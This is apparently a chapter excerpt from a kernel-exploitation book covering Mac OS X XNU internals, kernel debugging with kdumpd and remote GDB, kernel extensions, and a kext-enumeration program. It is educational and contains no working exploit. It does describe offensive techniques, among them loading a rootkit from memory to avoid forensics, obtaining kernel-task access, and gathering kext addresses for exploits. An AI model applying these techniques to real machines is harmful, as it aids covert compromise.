Chapter 5 Mac OS X

Information in this Chapter

  • An Overview of XNU

  • Kernel Debugging

  • Kernel Extensions (Kext)

  • The Execution Step

  • Exploitation Notes

Introduction

Mac OS X is the latest incarnation of Apple's operating system. Currently at Version 10.6.1 (at the time of this writing), Mac OS X is a complete rewrite of its predecessor, Mac OS 9, and was designed with no backward compatibility in mind.

Lying at the heart of Mac OS X is the XNU kernel. XNU, which stands for “X is Not UNIX,” was developed by NeXT, a company created by Steve Jobs after he left Apple in 1985. When Apple purchased NeXT it acquired both the XNU kernel and Jobs. This is when development on Mac OS X began. The XNU source code is available for download from the Apple Open Source Web site, www.opensource.apple.com/.

Early in its life cycle, Mac OS X ran solely on the PowerPC architecture. In 2006, however, with Version 10.4.4, Apple moved to 32-bit Intel processors, citing performance concerns with the PowerPC line. Apple eased this move for the most part by shipping a user-space tool named Rosetta, designed by Transitive Technologies, which dynamically translated PowerPC binaries into Intel instructions so that they could run on the newer machines. Later, in 2008, Apple released the iPhone OS, which is essentially a pared-down version of the XNU kernel designed for the ARMv6 and ARMv7-A architectures. Finally, in 2009, Apple released Mac OS X 10.6 (a.k.a. Snow Leopard), which made the switch to the 64-bit Intel architecture. This is the current state of XNU at the time of this writing. Snow Leopard also dropped support for the (now dated) PowerPC platform, which allowed Apple to shrink the size of the object files that shipped with the release.

Note

We will not cover the PowerPC architecture in this chapter, mainly because Apple no longer supports it and because the authors feel it is quickly becoming much less relevant. The chapter will focus on Mac OS X Leopard, which means the 32-bit x86 architecture will be the underlying target architecture used throughout. Note that since Mac OS X Snow Leopard, by default, boots a 32-bit kernel, a lot of the discussion in this chapter still applies directly to the latest (at the time of writing) release.

Although the architecture has changed significantly between releases of Mac OS X, the underlying operating system has remained relatively unchanged through each iteration.

Tools & Traps…

Mac OS X Fat Binaries

When Mac OS X began to support the Intel architecture in Version 10.4, Apple facilitated this by adding support for a new binary format known as Universal Binary or fat binary. This format is basically a way to store multiple Mach-O files (Mach object files) on disk as one archive file; the kernel then selects the file for the appropriate architecture when it loads the binary. The format itself is fairly simple to understand. It begins with a two-field fat_header structure:

struct fat_header {

uint32_t magic; /* FAT_MAGIC */

uint32_t nfat_arch; /* number of structs that follow */

};

This structure starts with the magic number (0xcafebabe) and is followed by the number of Mach-O files contained within the archive. After this header are multiple fat_arch structures:

struct fat_arch {

cpu_type_t cputype; /* cpu specifier (int) */

cpu_subtype_t cpusubtype; /* machine specifier (int) */

uint32_t offset; /* file offset to this object file */

uint32_t size; /* size of this object file */

uint32_t align; /* alignment as a power of 2 */

};

Each fat_arch structure describes the CPU type, size, and offset in the Universal Binary of each Mach-O file. At execution time, the kernel simply loads the Universal Binary from disk, parses each fat_arch structure, looking for a matching architecture type, and then begins to load the file at the specified offset.

An Overview of XNU

A common misconception about the XNU kernel is that it is a microkernel. This myth was probably perpetuated because one of the components of XNU is the Mach microkernel. However, this couldn't be further from the truth. XNU is actually larger than most other monolithic kernels because it comprises three separate components that interact with each other, all within the kernel's address space. These components are Mach, BSD, and IOKit.

Mach

The Mach component of XNU is based on the Mach 3.0 operating system developed at Carnegie Mellon University in 1985. At the time, it was designed heavily as a microkernel. However, while the operating system was being built, its developers used the 4.2BSD kernel as a shell to hold their code. As each Mach component was written, the equivalent BSD component was removed and replaced. As a result, early versions of Mach were monolithic kernels, similar to XNU, with BSD code and Mach combined. Inside XNU the Mach code is responsible for most of the lower-level functionality, such as virtual memory management (VMM), interprocess communications (IPC), preemptive multitasking, protected memory, and console I/O. Also inherent in the design of XNU are the Mach concept of tasks, rather than processes, containing several threads, and the IPC concepts of messages and ports.

Tip

You can find the Mach portion of the XNU source code in the /osfmk directory within the XNU source tree.

BSD

The BSD component of the XNU kernel is loosely based on the FreeBSD operating system. (Originally, FreeBSD 5.0 was used.) It is responsible for implementing a POSIX-compliant API (BSD system calls are implemented on top of the Mach functionality). It also implements a UNIX process model (pid/gids/pthreads) on top of the equivalent Mach concepts (task/thread). The FreeBSD virtual file system (VFS) code is also present in XNU, as well as the FreeBSD network stack.

Tip

As you would expect, the FreeBSD portion of the XNU source tree is stored in the /bsd directory.

IOKit

IOKit is the framework Apple provides for building device drivers on Mac OS X. It implements a restricted form of C++ with features removed that may cause problems in the kernel space. These include exception handling, multiple inheritance, and templating. Some of the features of IOKit include Plug and Play and power management support, as well as various other abstractions that are common among a variety of different devices.

IOKit also implements a Registry system in which all instantiated objects are tracked, as well as a catalog database of all the IOKit classes available. In the “Kernel Extensions” section of this chapter we will look at IOKit in more detail, as well as some of the utilities for manipulating the I/O Registry.

Tip

The code responsible for implementing IOKit in the XNU source tree is available in the /iokit directory.

An interesting design feature of XNU is that, rather than having the kernel and user mappings share the entire address space, the kernel is given a full address space (e.g., 4GB in the 32-bit version) of its own. This means that when a syscall takes place a full translation lookaside buffer (TLB) flush occurs. This adds quite a bit of overhead, but makes for some interesting situations. The kernel is essentially its own task/process and can be treated as such.

When the kernel is loaded into memory the first page is mapped with no access permissions. In this way, NULL pointer dereferences in the kernel space are no different from their user-space counterparts (typically nonexploitable). As far as exploitation is concerned, this also means you cannot keep your shellcode in user space and just return to it; instead, you need to store it somewhere in the kernel's address space. We will discuss this in more detail throughout this chapter.

System Call Tables

Because the XNU kernel has multiple technologies (Mach/BSD/IOKit) all tied together within Ring 0, there obviously needed to be some way to access the various components individually. Rather than compact all the system calls, service routines, and so forth from each component into one big table, the XNU developers chose to split them up into multiple tables.

The BSD system call structures (containing the function pointer and argument information, etc.) are stored, as is common on BSD operating systems, in a large array of sysent structures, known as the sysent table. The following code shows the definition of the sysent structure itself:

struct sysent {

int16_t sy_narg; /* number of arguments */

int8_t reserved; /* unused value */

int8_t sy_flags; /* call flags */

sy_call_t *sy_call; /* implementing function */

sy_munge_t *sy_arg_munge32;

sy_munge_t *sy_arg_munge64;

int32_t sy_return_type; /* return type */

uint16_t sy_arg_bytes;

} *_sysent;

Each entry in this table corresponds to a particular BSD system call. The offset for each of them is available in the /usr/include/sys/syscall.h file. We will look at this in more detail throughout the chapter.

The Mach system calls (known as Mach traps) are stored in another table known as the mach_trap_table. This table is very similar to the sysent table; however, it contains an array of mach_trap_t structures which, as you can see in the following code, are almost identical to a sysent struct:

typedef struct {

int mach_trap_arg_count;

int (*mach_trap_function)(void);

#if defined(__i386__)

boolean_t mach_trap_stack;

#else

mach_munge_t *mach_trap_arg_munge32; /* system call arguments for 32-bit */

mach_munge_t *mach_trap_arg_munge64; /* system call arguments for 64-bit */

#endif

#if !MACH_ASSERT

int mach_trap_unused;

#else

const char* mach_trap_name;

#endif /* !MACH_ASSERT */

} mach_trap_t;

Depending on the platform there can be several other tables like these, used for hardware-specific system calls.

To determine which table a user-land process is trying to utilize, the kernel needs some kind of selection mechanism in its syscall calling convention. Obviously, on XNU this has changed multiple times as new hardware was utilized.

Originally, on PowerPC, the system call (SC) instruction was used to signal an entry to kernel space. The number of the desired syscall was stored in the R0 general-purpose register.

Upon entering the kernel, this number was tested. A positive number was used as an offset into the sysent table; a negative number was used to offset the mach_trap_table. In this way, the same mechanism for making system calls could be used for either Mach or BSD system calls. Other tables were referenced via high syscall numbers. For example, numbers in the range 0x6000–0x600d were used to reference PPC-specific system calls.

With the move to the Intel platform, a new system call calling convention was needed, and Apple adopted the FreeBSD convention. This means the EAX register is used to store the number of the syscall to be executed. The arguments to the system call are then stored on the stack. Unlike FreeBSD, however, XNU uses a separate interrupt number to indicate which type of system call (Mach/BSD/etc.) needs to be executed. INT 0x80 is used to indicate a BSD system call to the kernel; when a Mach trap is desired the INT 0x81 instruction is used.

With the introduction of Snow Leopard (10.6.X) and Apple's corresponding move to a new platform (x64), a new calling convention was needed once more. Apple went with the SYSCALL instruction to enter kernel space. Once again, the EAX/RAX register was used to select which syscall to call. However, it also used the value 0x1000000 or 0x2000000 to indicate which system call table to use. If the 0x1000000 bit is set, the Mach trap table is used; 0x2000000 indicates that a BSD system call will be used.

Kernel Debugging

Before we can start exploiting XNU, we need a way to get some feedback on the state of the kernel. Just as we did in Chapter 4 we'll spend some time discussing the debugging options that the operating system offers.

The first option available is simply to view the report generated by CrashReporter on system reboot. Although this will probably provide us with the least possible amount of feedback, it can often be enough to work out simple issues. CrashReporter is invoked upon operating system reload after a kernel panic. When the admin user first logs in to the machine, he or she is presented with a dialog box that essentially offers two options: Ignore (and just continue with the normal startup) and Report. When you click the Report button another dialog is presented with the state of the registers and a backtrace at the time of the kernel panic. Figure 5.1 shows this second dialog box.

Image

Figure 5.1 Problem report dialog box.

As you can see, the EIP register has been set to 0xdeadbeef. However, this descriptive report is pretty much all we have and we cannot do any postmortem analysis on it.

The next step up from CrashReporter is to utilize the kdumpd daemon (in /usr/libexec/kdumpd). The kdumpd daemon is basically a hacked-up Trivial File Transfer Protocol (TFTP) daemon that runs over inetd on UDP port 1069 and simply sits and waits for information to be passed to it. When a configured machine receives a kernel panic, it opens a connection over the network to the daemon and sends a core dump. One of the advantages of using kdumpd is that you need only one Mac OS X machine. Kdumpd can be compiled on Linux, BSD, and most other POSIX-compliant platforms.

To set up kdumpd between two Mac OS X machines you simply start the kdumpd daemon on one machine and configure the other machine to use it. The first step in this process is to get kdumpd listening on one machine. On Mac OS X, simply create a directory in which to store your core dump files. Apple recommends that you accomplish this by issuing the following commands:1

-[luser@kdumpdserver]$ sudo mkdir /PanicDumps

-[luser@kdumpdserver]$ sudo chown root:wheel /PanicDumps/

-[luser@kdumpdserver]$ sudo chmod 1777 /PanicDumps/

However, if you're uncomfortable with creating a world-writable directory on your system, changing the directory's ownership to nobody:wheel and setting its permissions to 1770 should suffice. The next step is to start the daemon running. Apple provides a plist file (in /System/Library/LaunchDaemons/com.apple.kdumpd.plist) that contains default startup settings for the daemon. The daemon itself runs via xinetd. To start the daemon running you simply issue the following command:

-[luser@kdumpdserver]$ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.kdumpd.plist

This command communicates with the launchd daemon and tells it to start the kdumpd daemon on system start. Now that our kdumpd server is set up, we must configure the target machine being debugged to connect to it during a kernel panic. We can do this by using the nvram command to change the kernel's boot arguments, which are stored in the firmware's nonvolatile RAM. Specifically, we must populate a bit field named debug-flags to set the appropriate debugging options. Table 5.1 describes the possible values for this bit field.

Table 5.1 Toggling bits inside debug-flags allows configuration of various debugging options

Name                     Value    Description
DB_HALT                  0x0001   This will halt on boot and wait for a debugger to be attached.
DB_PRT                   0x0002   This causes kernel printf() statements to output to the console.
DB_NMI                   0x0004   When this is set, the Power button will generate a nonmaskable interrupt, which will break to the debugger.
DB_KPRT                  0x0008   This causes kernel kprintf() statements to output to the console.
DB_KDB                   0x0010   This selects DDB as the default kernel debugger. It is available only over a serial port interface when using a custom kernel.
DB_SLOG                  0x0020   This logs system diagnostic information to the syslog.
DB_ARP                   0x0040   This allows the kernel to ARP when trying to find the debugger to attach to. This is a security hole, but it is convenient.
DB_KDP_BP_DIS            0x0080   This supports older versions of GDB.
DB_LOG_PI_SCRN           0x0100   This disables the graphical kernel panic screen.
DB_KERN_DUMP_ON_PANIC    0x0400   When this is set, the kernel will core-dump when a panic is triggered.
DB_KERN_DUMP_ON_NMI      0x0800   This will make the kernel core-dump when a nonmaskable interrupt is received.
DB_DBG_POST_CORE         0x1000   When this is set, the kernel will wait for a debugger after dumping core in response to a kernel panic.
DB_PANICLOG_DUMP         0x2000   When this is set, the kernel will dump a panic log rather than a full core.

A typical kdumpd configuration is to use a flag value of 0x0d44. This value means the machine will generate a core file on nonmaskable interrupt or a kernel panic; the progress of the dump will be logged to the console. It also means the kernel will use Address Resolution Protocol (ARP) to look up the IP address of the server you wish to communicate with. (As we mentioned in Table 5.1, this is a security hole, as someone else responding to the ARP can debug your kernel.)

The last detail we need is the IP address of the computer running kdumpd. This needs to be specified in the _panicd_ip flag as part of the nvram boot-args variable. The finished command to set our boot-args to an appropriate value for kdumpd appears in the following code:

-[root@macosxbox]# nvram boot-args="debug=0xd44 _panicd_ip=<IP ADDRESS OF KDUMPD SYSTEM>"

Warning

If the target Mac OS X machine is running within VMware rather than natively, the nvram command will not change the boot-args. In this case, you can modify the /Library/Preferences/SystemConfiguration/com.apple.Boot.plist file to change the boot-args.

Once both computers are set up to communicate with each other when a panic occurs, the console on the panicked box displays its status as the core is uploaded to the kdumpd server. When this is complete the core should be visible in the /PanicDumps directory created earlier:

-[root@kdumpdserver:/PanicDumps]# ls

core-xnu-1228.15.4-192.168.1.100-445ae7d0

This core file is a typical Mach-O core and can be loaded and manipulated with GDB. To improve our debugging situation, it is best to first download the Kernel Debug Kit from http://developer.apple.com. This package contains symbols for the kernel as well as each kernel extension that ships with the OS. The kernel version in the kit you download must match the one being debugged. The Kernel Debug Kit is shipped as a .dmg (Mac OS X image format) file. To use it, simply double-click on it and it will mount (or use the hdiutil command-line utility with its mount verb).

Now we can fire up the debugger by specifying the mach_kernel file from the Kernel Debug Kit to use its symbols. The -c flag lets us specify the core file to use; in this case, we're using the core that was stored by kdumpd:

-[root@kdumpdserver:/PanicDumps]# gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-1228.15.4-192.168.1.100-445ae7d0

GNU gdb 6.3.50-20050815 (Apple version gdb-1344) (Fri Jul 3 01:19:56 UTC 2009)

[…]

This GDB was configured as "x86_64-apple-darwin"…

#0 Debugger (message=0x80010033 <Address 0x80010033 out of bounds>) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c:799

799 /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c: No such file or directory.

in /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c

The first thing we do is issue the bt backtrace command to dump the call stack and arguments for our current point of execution:

(gdb) bt

#0 Debugger (message=0x80010033 <Address 0x80010033 out of bounds>) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c:799

#1 0x0012b4c6 in panic (str=0x469a98 "Kernel trap at 0x%08x, type %d=%s, registers: CR0: 0x%08x, CR2: 0x%08x, CR3: 0x%08x, CR4: 0x%08x EAX: 0x%08x, EBX: 0x%08x, ECX: 0x%08x, EDX: 0x%08x CR2: 0x%08x, EBP: 0x%08x, ESI: 0x%08x, EDI: 0x%08x E"…) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/debug.c:275

#2 0x001ab0fe in kernel_trap (state=0x20cc3c34) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/trap.c:685

#3 0x001a1713 in trap_from_kernel () at pmap.h:176

#4 0xdeadbeef in ?? ()

#5 0x00190c2b in kmod_start_or_stop (id=114, start=1, data=0x44ae3a4, dataCount=0x44ae3c0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c:993

#6 0x00190efc in kmod_control (host_priv=0x5478e0, id=114, flavor=1, data=0x44ae3a4, dataCount=0x44ae3c0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c:1121

#7 0x001486f9 in _Xkmod_control (InHeadP=0x44ae388, OutHeadP=0x31a6f90) at mach/host_priv_server.c:2891

#8 0x0012d4d6 in ipc_kobject_server (request=0x44ae300) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/ipc_kobject.c:331

#9 0x001264fa in mach_msg_overwrite_trap (args=0x0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/ipc/mach_msg.c:1623

#10 0x00198fa3 in mach_call_munger (state=0x28cab04) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/bsd_i386.c:714

#11 0x001a1cfa in lo_mach_scall () at pmap.h:176

As you can see from the output, the core was generated from a function called Debugger, which was called from panic() in frame 1. Obviously, these are the functions associated with generating the core file, after the panic() has already occurred. Frame 4 is of interest, however, with an EIP value of 0xdeadbeef, as per our previous panic log. But how did the execution get to this point?

Frame 5 gives us a clue. The kmod_start_or_stop() function is called when a kernel module (kernel extension) is loaded or unloaded. The start argument is used as a Boolean to determine if a load or unload is occurring. In our case, it is set to true, so this is a kernel extension being loaded. The kmod_start_or_stop() function is then responsible for calling the constructor (or destructor) of the kernel extension.

To investigate this further, we can load a few more tools from the Kernel Debug Kit. The kgmacros file contains a variety of GDB macros for parsing and displaying various kernel structures and components. To load this file from GDB we issue the following command:

(gdb) source /Volumes/KernelDebugKit/kgmacros

Loading Kernel GDB Macros package. Type "help kgm" for more info.

Once this is loaded, we have around 50 additional commands we can use to probe for more information. The first command that is useful to us in this case is showcurrentthreads. This basically shows the task and thread information for each running processor.

(gdb) showcurrentthreads

Processor 0x005470c0 State 6 (cpu_id 0)

task vm_map ipc_space #acts pid proc command

0x028bc474 0x015685d0 0x0286b3c4 1 150 0x02bac6fc kextload

thread processor pri state wait_queue wait_event

0x031c2d60 0x005470c0 31 R

In this case, we can see that the command being executed is kextload. This command loads a kernel extension (kext) from disk into the kernel, so this information supports our theory that our crash took place from within the loading process of a kernel extension. To determine which one, we can use the showallkmods command to dump a list of loaded modules at the time of the crash:

(gdb) showallkmods

kmod address size id refs version name

0x20f96060 0x20f95000 0x00002000 114 0 1.0.0d1 com.yourcompany.kext.Crash

0x2bbed020 0x2bbe5000 0x00009000 113 0 2.0.0 com.vmware.kext.vmnet

0x2bb8dd60 0x2bb89000 0x00006000 112 0 2.0.0 com.vmware.kext.vmioplug

0x2ba811e0 0x2ba77000 0x0000b000 111 0 2.0.0 com.vmware.kext.vmci

0x2ba9eda0 0x2ba8f000 0x000d2000 110 0 2.0.0 com.vmware.kext.vmx86

In the preceding output, you can see that the latest kernel extension loaded was com.yourcompany.kext.Crash. So, it stands to reason that this is the location of the code that triggered the panic.

Note

To see a complete list of macros imported by the kgmacros file simply run the help kgm command after issuing the source command from earlier.

The next step in analyzing this vulnerability is to attach GDB (the GNU Debugger) to the kernel directly over the network.A To do this, first we have to set the nvram boot-args variable to allow remote debugging. This time we set the debug value to 0x44 (DB_ARP | DB_NMI). This is achieved via a similar nvram command to the one shown earlier:

-[root@macosxbox]# nvram boot-args="debug=0x44"

After a reboot, we are ready to go and we start by briefly pressing the Power button on our newly set up box. This generates a nonmaskable interrupt and causes the kernel to wait for a debugger connection. Next, we instantiate GDB on our debugger box and pass it the mach_kernel from the Kernel Debug Kit to use the correct symbols. The target command can be used to specify remote-kdp as the protocol for remote debugging. After this, it's simply a matter of typing attach followed by the IP address of the waiting machine:

-[root@remotegdb:~/]# gdb /Volumes/KernelDebugKit/mach_kernel

(gdb) target remote-kdp

(gdb) attach <ip address of target>

Connected.

(gdb) c

Continuing.

Now the actual debugging starts. Let's put a breakpoint on the kmod_start_or_stop() function from the kdumpd backtrace we saw earlier:

Program received signal SIGTRAP, Trace/breakpoint trap.

0x001b0b60 in ?? ()

(gdb) break kmod_start_or_stop

Breakpoint 1 at 0x190b5f: file /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c, line 957.

(gdb) c

Continuing.

At this point, we can re-create the issue on the vulnerable box (loading our Crash kext). Immediately, we hit our breakpoint:

Breakpoint 1, kmod_start_or_stop (id=114, start=1, data=0x3ead6a4, dataCount=0x3ead6c0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c:957

957 /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c: No such file or directory.

in /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c

(gdb) bt

#0 kmod_start_or_stop (id=114, start=1, data=0x3ead6a4, dataCount=0x3ead6c0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c:957

#1 0x00190efc in kmod_control (host_priv=0x5478e0, id=114, flavor=1, data=0x3ead6a4, dataCount=0x3ead6c0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c:1121

#2 0x001486f9 in _Xkmod_control (InHeadP=0x3ead688, OutHeadP=0x3f1f090) at mach/host_priv_server.c:2891

#3 0x0012d4d6 in ipc_kobject_server (request=0x3ead600) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/ipc_kobject.c:331

#4 0x001264fa in mach_msg_overwrite_trap (args=0x1) at /SourceCache/xnu/xnu-1228.15.4/osfmk/ipc/mach_msg.c:1623

#5 0x00198fa3 in mach_call_munger (state=0x25a826c) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/bsd_i386.c:714

#6 0x001a1cfa in lo_mach_scall () at pmap.h:176

When a kernel extension is loaded a kmod_info structure is instantiated that contains information about the kernel extension. By stepping through the function until the kmod_info struct k is populated, we can use GDB's print command to display the structure:

(gdb) print (kmod_info) *k

$2 = {

next = 0x227f5020,

info_version = 1,

id = 114,

name = "com.yourcompany.kext.Crash", '\0' <repeats 37 times>,

version = "1.0.0d1", '\0' <repeats 56 times>,

reference_count = 0,

reference_list = 0x29e71c0,

address = 563466240,

size = 8192,

hdr_size = 4096,

start = 0x2195e018,

stop = 0x2195e02c

}

Now we can break on the start() function (which is called on module initialization):

(gdb) break *k->start

Breakpoint 2 at 0x2195e018

After this breakpoint is hit, we dump the next 10 instructions using the examine command:

(gdb) x/10i $pc

0x2195e018: push %ebp

0x2195e019: mov 0x2195e048,%ecx

0x2195e01f: mov %esp,%ebp

0x2195e021: test %ecx,%ecx

0x2195e023: je 0x2195e028

0x2195e025: leave

0x2195e026: jmp *%ecx

[…]

We can easily spot that the code simply jumps through a function pointer held in ECX (jmp *%ecx). That means control will be transferred to whatever address ECX holds. At this point, it's worth taking a look at the value of ECX, which we can do with the info registers command:

(gdb) i r ecx

ecx 0x2195e000 563470336

Execution will be transferred to this address. Let's dump 10 instructions here:

(gdb) x/10i $ecx

0x2195e000: push %ebp

0x2195e001: mov $0xdeadbeef,%eax

0x2195e006: mov %esp,%ebp

0x2195e008: sub $0x8,%esp

0x2195e00b: call *%eax

0x2195e00d: xor %eax,%eax

0x2195e00f: leave

0x2195e010: ret

Here goes our 0xdeadbeef value! The value is copied into EAX; then the stack is set up and a call is made to the address contained in EAX. The exception we got at the start now makes a lot of sense. In fact, when we continue the execution, we receive a SIGTRAP:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

Although we showed only a simple example here, it should give you a good idea of how invaluable it can be to debug the kernel using this setup. We will use this setup through the rest of this chapter.

Although GDB can be an excellent tool for investigating the state of the kernel, sometimes during exploitation you may want more programmatic control over the debugging interface. In this case, it can be useful to know that, because the kernel on Mac OS X is just another Mach task, all the typical functions you would use to interact with memory (vm_read()/vm_write()/vm_allocate()/etc.) will work cleanly on the kernel task. To get send rights to the kernel task's port, you can use the task_for_pid() function with a PID of 0. We will not show an example here, since many documents on the Mach debugging interface are available online.

Kernel Extensions (Kext)

Since XNU is a modular kernel (it supports loadable kernel modules), a file format is needed for storing these modules on disk. To accomplish this, Apple developed the kext format. On Mac OS X, most of the kernel extensions the system uses are stored in /System/Library/Extensions. Rather than a single file, a kernel extension (.kext) is a directory containing several files. Most importantly, it contains the loadable object file itself (in Mach-O format); however, it also typically includes an XML file (Info.plist) explaining how the kext is linked, and how it should be loaded.

The directory structure of a kernel extension typically looks as follows:

./Contents

./Contents/Info.plist

./Contents/MacOS

./Contents/MacOS/<Name of Binary>

./Contents/Resources

./Contents/Resources/English.lproj

./Contents/Resources/English.lproj/InfoPlist.strings

As we mentioned at the beginning of this section, the Info.plist file is simply an XML file containing information about how to load the kext. Table 5.2 lists some common properties of this file.

Table 5.2 Common Info.plist properties

Property                     Description
CFBundleExecutable           Specifies the name of the executable file within the Contents/MacOS directory.
CFBundleDevelopmentRegion    Specifies the region the kext was created in, for example, “English”.
CFBundleIdentifier           A unique identifier used to represent this kernel extension, for example, com.apple.filesystems.smbfs.
CFBundleName                 The name of the kernel extension.
CFBundleVersion              The kernel extension's bundle version.
OSBundleLibraries            A dictionary of libraries that are linked with the kernel extension.

Here is an extract from the .plist file from the smbfs kernel extension distributed with Mac OS X:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

<plist version="1.0">

<dict>

<key>CFBundleDevelopmentRegion</key>

<string>English</string>

<key>CFBundleExecutable</key>

<string>smbfs</string>

<key>CFBundleIdentifier</key>

<string>com.apple.filesystems.smbfs</string>

<key>CFBundleInfoDictionaryVersion</key>

<string>6.0</string>

<key>CFBundleName</key>

<string>smbfs</string>

<key>CFBundlePackageType</key>

<string>KEXT</string>

<key>CFBundleShortVersionString</key>

<string>1.4.6</string>

<key>CFBundleSignature</key>

<string>????</string>

<key>CFBundleVersion</key>

<string>1.4.6</string>

<key>OSBundleLibraries</key>

<dict>

<key>com.apple.kpi.bsd</key>

<string>9.0.0</string>

<key>com.apple.kpi.iokit</key>

<string>9.0.0</string>

<key>com.apple.kpi.libkern</key>

<string>9.0.0</string>

<key>com.apple.kpi.mach</key>

<string>9.0.0</string>

<key>com.apple.kpi.unsupported</key>

<string>9.0.0</string>

</dict>

</dict>

</plist>

As you can see, it's a fairly simple XML document containing the fields described in Table 5.2.

The easiest way to create your own kernel extension is to use the Xcode IDE from Apple to generate a project for it. To do this, simply fire up the Xcode application and select New Project from the File menu. Then select the Kernel Extension menu and click on Generic Kernel Extension, as shown in Figure 5.2.

Image

Figure 5.2 Creating a new kernel extension from Xcode

As you can see in Figure 5.2, Xcode will generate the appropriate files for starting a variety of projects.

Note

Selecting IOKit Driver from the menu shown in Figure 5.2 will result in the IOKit libraries being linked with your kext.

Once this process is finished, the Xcode IDE fires up and presents us with a dialog window that lists the files associated with our new project. Xcode will automatically generate the Info.plist and InfoPlist.strings files we need; however, before we can build our kernel extension we must edit the Info.plist file to show which libraries we plan to use, as shown in Figure 5.3.

Image

Figure 5.3 Adding libraries to an Info.plist file.

The circled area in Figure 5.3 shows the most common frameworks (com.apple.kpi.bsd and com.apple.kpi.libkern) added to our .plist file. We can add additional libraries, but for the sake of our simple example, these are the only libraries we need.

Obviously, we need to add some code to our kext's source file for it to actually do something. Xcode will add start() and stop() functions for our kext by default. The start() function is executed when the kernel extension is loaded and the stop() function is executed when the kernel extension is unloaded. Our simple HelloWorld kext code will look like this:

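#include <mach/mach_types.h>

#include <libkern/libkern.h> /* kernel printf() */

/* called when the kext is loaded */

kern_return_t HelloWorld_start(kmod_info_t *ki, void *d) {

    printf("Hello, World!\n");

    return KERN_SUCCESS;

}

/* called when the kext is unloaded */

kern_return_t HelloWorld_stop(kmod_info_t *ki, void *d) {

    printf("Goodbye, World!\n");

    return KERN_SUCCESS;

}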

Once our kernel extension is set up, we can simply click the Build button and Xcode will invoke the GNU Compiler Collection (GCC) to compile our code. Before we can load our newly created kernel extension, however, we must change the file permissions on our binary. When loading kernel extensions Mac OS X requires that the file be owned by root:wheel and that none of the files within the kext directory be writable or executable by group or other. After we change the file permissions per Mac OS X requirements, we can utilize the kextload command to load our kernel extension into kernel space. This application uses the KLD API (implemented in libkld.dylib) to load the kernel extension from disk into kernel memory.

-[root@macosxbox:]$ kextload HelloWorld.kext

kextload: HelloWorld.kext loaded successfully

The usage is very straightforward, and our kernel extension has loaded correctly. If we use the tail command to view the last entry in the system log, we can see that our kernel extension's start function has been called as expected and our “Hello, World!” output has been displayed:

-[root@macosxbox]$ tail -n1 /var/log/system.log

Nov 17 13:50:14 macosxbox kernel[0]: Hello, World!

We can reverse this process and unload our kernel extension with the kextunload command, in this case executing kextunload HelloWorld.kext.

Tools & Traps…

The KLD API

Both kextload and kextunload utilize the KLD API to accomplish their tasks.

The KLD API has two purposes. First, it allows for kernel extensions to be loaded from user space into the kernel. The libkld.dylib user-space library is responsible for implementing this functionality. There are several functions for loading different object files from disk into kernel memory, among them kld_load() and kld_load_basefile(). The library also implements the ability to load a kernel extension directly from user-space memory into the kernel. This is accomplished using the kld_load_from_memory() function. This can be useful for attackers who want to avoid forensic analysis. By exploiting a process remotely over the network, gaining root privileges, and then calling kld_load_from_memory(), an attacker can easily install his or her kernel extension-based rootkit on the machine without touching the disk.

The second function of the KLD API is the ability to allow the kernel to load required boot-time drivers. In this case, the kernel calls the functions responsible for loading the kernel extension directly. It is useful to know that you can load additional kernel extensions from within kernel space.

It is also possible to query the state of all the kernel extensions mapped into the kernel as an unprivileged user, as well as their load address, size, and other useful information. You can do this either by using the kextstat command-line utility that dumps each kernel extension in a readable format (as shown in the following code), or by using the Mach kmod_get_info() API to programmatically query the same information.

Index Refs Address Size Wired Name (Version) <Linked Against>

12 19 0x0 0x0 0x0 com.apple.kernel.6.0 (7.9.9)

13 1 0x0 0x0 0x0 com.apple.kernel.bsd (7.9.9)

14 1 0x0 0x0 0x0 com.apple.kernel.iokit (7.9.9)

15 1 0x0 0x0 0x0 com.apple.kernel.libkern (7.9.9)

16 1 0x0 0x0 0x0 com.apple.kernel.mach (7.9.9)

17 18 0x5ce000 0x11000 0x10000 com.apple.iokit.IOPCIFamily (2.6) <7 6 5

The Mach interface to query this information is pretty straightforward and can be useful for automating the process inside an exploit. It is just a matter of calling the kmod_get_info() function and passing in the address of a kmod_info struct pointer. This pointer is then updated to a freshly allocated list of kmods on the system. Here is a snippet of code that prints output similar to the kextstat program. As usual, the code in its entirety is available online at www.attackingthecore.com.

#include <stdio.h>

#include <mach/mach.h>

int

main (int ac, char **av)

{

    mach_port_t task;

    kmod_info_t *kmods;

    unsigned int nokexts;

    task = mach_host_self();

    /* on success, kmods points at a freshly allocated array of records */

    if ((kmod_get_info (task, (void *) &kmods, &nokexts) != KERN_SUCCESS)){

        printf("error: could not retrieve list of kexts.\n");

        return 1;

    }

    /* a non-NULL next field only signals that another record follows */

    for (; kmods; kmods = (kmods->next) ? (kmods + 1): NULL)

        printf ("- Name: %s, Version: %s, Load Address: 0x%08x Size: 0x%x\n", kmods->name, kmods->version, kmods->address, kmods->size);

    return 0;

}
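
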